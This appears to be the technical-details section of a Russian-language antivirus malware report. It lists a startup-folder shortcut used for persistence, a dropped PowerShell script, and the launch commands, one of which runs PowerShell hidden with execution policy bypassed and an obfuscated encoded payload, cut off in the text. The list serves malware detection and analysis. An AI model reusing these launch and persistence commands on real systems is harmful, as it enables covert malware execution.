Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\fyqepjfnnubmyjwudrgkrbtizvqadsphxosohltgxcwvmcelakiz.lnk
- %APPDATA%\lfnskwnbcmasd.ps1
- %LOCALAPPDATA%\fyqepjfnnubmyjwudrgkrbtizvqadsphxosohltgxcwvmcelakiz
- %APPDATA%\lfnskwnbcmasd.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass "%APPDATA%\lfnskwnbcmasd.ps1"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass "%APPDATA%\lfnskwnbcmasd.ps1"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WINdowSTyLE hiDdEN -eXeCutIOnpolIcy byPAsS -cOmManD "$a8132ddd37a4a69f05ff739fa1555='Xk9MNUhAd30kNV5RKmdyQFJ6QnVeUUZJQEBWJF9aQFIrZnRAc1BLVl5Sa3EhXk9MOEJeU3JPTEB2Zzl+QHdsJj5AcSk2NUB2QHFnQHQyOTd...